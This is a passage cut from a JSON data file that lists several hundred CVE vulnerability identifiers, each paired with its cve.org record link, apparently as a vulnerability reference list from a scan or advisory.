"url": "https://www.cve.org/CVERecord?id=CVE-2025-4287"
},
{
"name": "CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"name": "CVE-2025-21731",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21731"
},
{
"name": "CVE-2023-48237",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48237"
},
{
"name": "CVE-2023-48706",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48706"
},
{
"name": "CVE-2021-3605",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3605"
},
{
"name": "CVE-2025-38515",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38515"
},
{
"name": "CVE-2025-22872",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22872"
},
{
"name": "CVE-2024-25126",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25126"
},
{
"name": "CVE-2025-21941",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21941"
},
{
"name": "CVE-2025-8277",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8277"
},
{
"name": "CVE-2025-8941",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8941"
},
{
"name": "CVE-2017-10928",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-10928"
},
{
"name": "CVE-2023-52425",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52425"
},
{
"name": "CVE-2025-38163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38163"
},
{
"name": "CVE-2021-35567",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35567"
},
{
"name": "CVE-2017-12429",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-12429"
},
{
"name": "CVE-2025-38444",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38444"
},
{
"name": "CVE-2023-38546",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38546"
},
{
"name": "CVE-2019-8322",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-8322"
},
{
"name": "CVE-2024-52615",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52615"
},
{
"name": "CVE-2020-14579",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14579"
},
{
"name": "CVE-2023-2157",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2157"
},
{
"name": "CVE-2025-32386",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32386"
},
{
"name": "CVE-2025-21823",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21823"
},
{
"name": "CVE-2025-11731",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11731"
},
{
"name": "CVE-2019-1010238",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-1010238"
},
{
"name": "CVE-2024-26700",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26700"
},
{
"name": "CVE-2024-58082",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58082"
},
{
"name": "CVE-2024-35176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35176"
},
{
"name": "CVE-2024-33602",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33602"
},
{
"name": "CVE-2025-55551",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55551"
},
{
"name": "CVE-2025-50100",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50100"
},
{
"name": "CVE-2023-29404",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29404"
},
{
"name": "CVE-2025-21763",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21763"
},
{
"name": "CVE-2023-21954",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21954"
},
{
"name": "CVE-2025-40780",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40780"
},
{
"name": "CVE-2023-48368",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48368"
},
{
"name": "CVE-2014-4715",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-4715"
},
{
"name": "CVE-2022-4304",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4304"
},
{
"name": "CVE-2023-21939",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21939"
},
{
"name": "CVE-2022-48554",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48554"
},
{
"name": "CVE-2022-0563",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0563"
},
{
"name": "CVE-2025-38157",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38157"
},
{
"name": "CVE-2023-24757",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24757"
},
{
"name": "CVE-2024-20926",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20926"
},
{
"name": "CVE-2025-21678",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21678"
},
{
"name": "CVE-2025-4056",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4056"
},
{
"name": "CVE-2024-28757",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28757"
},
{
"name": "CVE-2020-29562",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-29562"
},
{
"name": "CVE-2022-31683",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-31683"
},
{
"name": "CVE-2020-22218",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-22218"
},
{
"name": "CVE-2025-0913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0913"
},
{
"name": "CVE-2025-53062",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53062"
},
{
"name": "CVE-2015-4776",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4776"
},
{
"name": "CVE-2025-21872",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21872"
},
{
"name": "CVE-2017-3616",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3616"
},
{
"name": "CVE-2021-2163",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-2163"
},
{
"name": "CVE-2025-21922",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21922"
},
{
"name": "CVE-2025-27817",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27817"
},
{
"name": "CVE-2023-30086",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-30086"
},
{
"name": "CVE-2017-6832",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6832"
},
{
"name": "CVE-2022-2208",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2208"
},
{
"name": "CVE-2024-45720",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45720"
},
{
"name": "CVE-2022-1056",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1056"
},
{
"name": "CVE-2018-10805",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-10805"
},
{
"name": "CVE-2019-19906",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-19906"
},
{
"name": "CVE-2025-38219",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38219"
},
{
"name": "CVE-2015-4785",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4785"
},
{
"name": "CVE-2025-38466",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38466"
},
{
"name": "CVE-2022-24921",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24921"
},
{
"name": "CVE-2022-32208",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32208"
},
{
"name": "CVE-2020-15095",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-15095"
},
{
"name": "CVE-2018-16328",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-16328"
},
{
"name": "CVE-2024-38949",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38949"
},
{
"name": "CVE-2022-28327",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28327"
},
{
"name": "CVE-2025-5745",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5745"
},
{
"name": "CVE-2025-47907",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47907"
},
{
"name": "CVE-2022-43239",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43239"
},
{
"name": "CVE-2022-41409",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41409"
},
{
"name": "CVE-2022-32546",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32546"
},
{
"name": "CVE-2025-0838",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0838"
},
{
"name": "CVE-2024-57980",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57980"
},
{
"name": "CVE-2023-5441",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5441"
},
{
"name": "CVE-2025-55553",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55553"
},
{
"name": "CVE-2024-12797",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12797"
},
{
"name": "CVE-2024-58011",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58011"
},
{
"name": "CVE-2025-21796",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21796"
},
{
"name": "CVE-2024-12086",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12086"
},
{
"name": "CVE-2025-27219",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27219"
},
{
"name": "CVE-2025-21691",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21691"
},
{
"name": "CVE-2021-4219",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4219"
},
{
"name": "CVE-2018-15798",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-15798"
},
{
"name": "CVE-2025-55154",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55154"
},
{
"name": "CVE-2025-49146",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49146"
},
{
"name": "CVE-2025-40026",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40026"
},
{
"name": "CVE-2022-1292",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1292"
},
{
"name": "CVE-2022-3153",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3153"
},
{
"name": "CVE-2022-2057",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2057"
},
{
"name": "CVE-2025-5197",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5197"
},
{
"name": "CVE-2023-45283",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45283"
},
{
"name": "CVE-2023-39328",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39328"
},
{
"name": "CVE-2023-45853",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45853"
},
{
"name": "CVE-2024-47611",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47611"
},
{
"name": "CVE-2017-11447",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-11447"
},
{
"name": "CVE-2019-8323",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-8323"
},
{
"name": "CVE-2023-39593",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39593"
},
{
"name": "CVE-2025-45582",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-45582"
},
{
"name": "CVE-2025-46569",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46569"
},
{
"name": "CVE-2024-21068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21068"
},
{
"name": "CVE-2018-14434",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14434"
},
{
"name": "CVE-2019-6293",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-6293"
},
{
"name": "CVE-2025-30703",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30703"
},
{
"name": "CVE-2025-21738",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21738"
},
{
"name": "CVE-2022-48522",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48522"
},
{
"name": "CVE-2025-21684",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21684"
},
{
"name": "CVE-2023-50868",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50868"
},
{
"name": "CVE-2023-45288",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45288"
},
{
"name": "CVE-2023-21830",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21830"
},
{
"name": "CVE-2023-26965",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26965"
},
{
"name": "CVE-2023-2602",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2602"
},
{
"name": "CVE-2021-2161",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-2161"
},
{
"name": "CVE-2025-6069",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6069"
},
{
"name": "CVE-2023-3817",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3817"
},
{
"name": "CVE-2017-10140",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-10140"
},
{
"name": "CVE-2021-2341",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-2341"
},
{
"name": "CVE-2021-3468",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3468"
},
{
"name": "CVE-2024-6232",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6232"
},
{
"name": "CVE-2024-58061",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58061"
},
{
"name": "CVE-2025-46148",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46148"
},
{
"name": "CVE-2024-58058",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58058"
},
{
"name": "CVE-2025-21768",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21768"
},
{
"name": "CVE-2025-21864",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21864"
},
{
"name": "CVE-2025-2149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2149"
},
{
"name": "CVE-2021-3502",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3502"
},
{
"name": "CVE-2025-6052",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6052"
},
{
"name": "CVE-2018-16329",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-16329"
},
{
"name": "CVE-2022-41725",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41725"
},
{
"name": "CVE-2025-24813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24813"
},
{
"name": "CVE-2024-58056",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58056"
},
{
"name": "CVE-2023-52426",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52426"
},
{
"name": "CVE-2025-50080",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50080"
},
{
"name": "CVE-2025-21725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21725"
},
{
"name": "CVE-2024-43790",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43790"
},
{
"name": "CVE-2025-38313",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38313"
},
{
"name": "CVE-2025-38336",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38336"
},
{
"name": "CVE-2022-2058",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2058"
},
{
"name": "CVE-2025-22009",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22009"
},
{
"name": "CVE-2025-38061",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38061"
},
{
"name": "CVE-2022-45061",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-45061"
},
{
"name": "CVE-2025-21727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21727"
},
{
"name": "CVE-2024-45492",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45492"
},
{
"name": "CVE-2015-4764",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4764"
},
{
"name": "CVE-2025-22228",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22228"
},
{
"name": "CVE-2022-43240",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43240"
},
{
"name": "CVE-2020-1752",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-1752"
},
{
"name": "CVE-2025-5987",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5987"
},
{
"name": "CVE-2023-4091",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4091"
},
{
"name": "CVE-2022-30635",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30635"
},
{
"name": "CVE-2025-38375",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38375"
},
{
"name": "CVE-2015-4779",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4779"
},
{
"name": "CVE-2021-20312",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20312"
},
{
"name": "CVE-2025-4330",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4330"
},
{
"name": "CVE-2025-2953",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2953"
},
{
"name": "CVE-2020-14593",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14593"
},
{
"name": "CVE-2025-21904",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21904"
},
{
"name": "CVE-2019-20838",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20838"
},
{
"name": "CVE-2025-37798",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37798"
},
{
"name": "CVE-2022-41715",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41715"
},
{
"name": "CVE-2025-50078",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50078"
},
{
"name": "CVE-2022-28739",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28739"
},
{
"name": "CVE-2024-26726",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26726"
},
{
"name": "CVE-2023-52593",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52593"
},
{
"name": "CVE-2025-3933",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3933"
},
{
"name": "CVE-2023-26785",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26785"
},
{
"name": "CVE-2025-49794",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49794"
},
{
"name": "CVE-2020-14664",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14664"
},
{
"name": "CVE-2023-48235",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48235"
},
{
"name": "CVE-2024-57970",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57970"
},
{
"name": "CVE-2024-9287",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9287"
},
{
"name": "CVE-2025-21668",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21668"
},
{
"name": "CVE-2025-22004",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22004"
},
{
"name": "CVE-2022-32207",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32207"
},
{
"name": "CVE-2024-44939",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44939"
},
{
"name": "CVE-2024-43374",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43374"
},
{
"name": "CVE-2023-50782",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50782"
},
{
"name": "CVE-2025-21929",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21929"
},
{
"name": "CVE-2025-4138",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4138"
},
{
"name": "CVE-2022-41722",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41722"
},
{
"name": "CVE-2022-3627",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3627"
},
{
"name": "CVE-2020-14797",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14797"
},
{
"name": "CVE-2025-21735",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21735"
},
{
"name": "CVE-2024-3596",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3596"
},
{
"name": "CVE-2023-0215",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0215"
},
{
"name": "CVE-2024-27280",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27280"
},
{
"name": "CVE-2025-3000",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3000"
},
{
"name": "CVE-2022-3213",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3213"
},
{
"name": "CVE-2022-2867",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2867"
},
{
"name": "CVE-2023-36632",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-36632"
},
{
"name": "CVE-2021-23177",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-23177"
},
{
"name": "CVE-2020-14798",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14798"
},
{
"name": "CVE-2007-4559",
"url": "https://www.cve.org/CVERecord?id=CVE-2007-4559"
},
{
"name": "CVE-2025-21839",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21839"
},
{
"name": "CVE-2025-38112",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38112"
},
{
"name": "CVE-2025-5878",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5878"
},
{
"name": "CVE-2023-0286",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0286"
},
{
"name": "CVE-2022-3715",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3715"
},
{
"name": "CVE-2023-4016",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4016"
},
{
"name": "CVE-2024-58063",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58063"
},
{
"name": "CVE-2015-4780",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4780"
},
{
"name": "CVE-2024-41957",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41957"
},
{
"name": "CVE-2025-38500",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38500"
},
{
"name": "CVE-2024-56171",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56171"
},
{
"name": "CVE-2025-24293",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24293"
},
{
"name": "CVE-2025-8961",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8961"
},
{
"name": "CVE-2025-21977",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21977"
},
{
"name": "CVE-2022-25147",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25147"
},
{
"name": "CVE-2025-21779",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21779"
},
{
"name": "CVE-2024-58005",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58005"
},
{
"name": "CVE-2025-21674",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21674"
},
{
"name": "CVE-2022-3598",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3598"
},
{
"name": "CVE-2025-30696",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30696"
},
{
"name": "CVE-2023-0798",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0798"
},
{
"name": "CVE-2025-21918",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21918"
},
{
"name": "CVE-2025-38203",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38203"
},
{
"name": "CVE-2023-45285",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45285"
},
{
"name": "CVE-2022-0909",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0909"
},
{
"name": "CVE-2025-8176",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8176"
},
{
"name": "CVE-2023-28154",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28154"
},
{
"name": "CVE-2023-48231",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48231"
},
{
"name": "CVE-2025-55752",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55752"
},
{
"name": "CVE-2023-38633",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38633"
},
{
"name": "CVE-2025-21948",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21948"
},
{
"name": "CVE-2023-2609",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2609"
},
{
"name": "CVE-2025-53905",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53905"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2021-46312",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-46312"
},
{
"name": "CVE-2018-14628",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14628"
},
{
"name": "CVE-2022-21299",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21299"
},
{
"name": "CVE-2022-38476",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38476"
},
{
"name": "CVE-2019-6461",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-6461"
},
{
"name": "CVE-2022-3515",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3515"
},
{
"name": "CVE-2025-38004",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38004"
},
{
"name": "CVE-2020-2773",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2773"
},
{
"name": "CVE-2015-5262",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-5262"
},
{
"name": "CVE-2022-43244",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43244"
},
{
"name": "CVE-2024-24783",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24783"
},
{
"name": "CVE-2025-21753",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21753"
},
{
"name": "CVE-2017-6004",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6004"
},
{
"name": "CVE-2023-45284",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45284"
},
{
"name": "CVE-2015-7696",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-7696"
},
{
"name": "CVE-2023-29403",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29403"
},
{
"name": "CVE-2025-38387",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38387"
},
{
"name": "CVE-2023-45922",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45922"
},
{
"name": "CVE-2015-4754",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4754"
},
{
"name": "CVE-2025-21699",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21699"
},
{
"name": "CVE-2025-38362",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38362"
},
{
"name": "CVE-2022-27776",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27776"
},
{
"name": "CVE-2023-45322",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45322"
},
{
"name": "CVE-2024-24791",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24791"
},
{
"name": "CVE-2024-20921",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20921"
},
{
"name": "CVE-2022-39046",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-39046"
},
{
"name": "CVE-2020-14578",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14578"
},
{
"name": "CVE-2025-21584",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21584"
},
{
"name": "CVE-2022-42916",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42916"
},
{
"name": "CVE-2025-40004",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40004"
},
{
"name": "CVE-2017-7619",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7619"
},
{
"name": "CVE-2024-8176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8176"
},
{
"name": "CVE-2020-2805",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2805"
},
{
"name": "CVE-2025-21712",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21712"
},
{
"name": "CVE-2025-38371",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38371"
},
{
"name": "CVE-2023-2731",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2731"
},
{
"name": "CVE-2025-58767",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58767"
},
{
"name": "CVE-2021-35939",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35939"
},
{
"name": "CVE-2024-57982",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57982"
},
{
"name": "CVE-2025-38445",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38445"
},
{
"name": "CVE-2024-38819",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38819"
},
{
"name": "CVE-2023-0803",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0803"
},
{
"name": "CVE-2023-4807",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4807"
},
{
"name": "CVE-2025-21746",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21746"
},
{
"name": "CVE-2022-0391",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0391"
},
{
"name": "CVE-2023-1170",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1170"
},
{
"name": "CVE-2022-24070",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24070"
},
{
"name": "CVE-2025-38461",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38461"
},
{
"name": "CVE-2019-17547",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-17547"
},
{
"name": "CVE-2024-45341",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45341"
},
{
"name": "CVE-2021-36411",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36411"
},
{
"name": "CVE-2023-30774",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-30774"
},
{
"name": "CVE-2018-10919",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-10919"
},
{
"name": "CVE-2024-13176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-13176"
},
{
"name": "CVE-2020-2830",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2830"
},
{
"name": "CVE-2025-53014",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53014"
},
{
"name": "CVE-2025-7962",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7962"
},
{
"name": "CVE-2022-21624",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21624"
},
{
"name": "CVE-2020-2781",
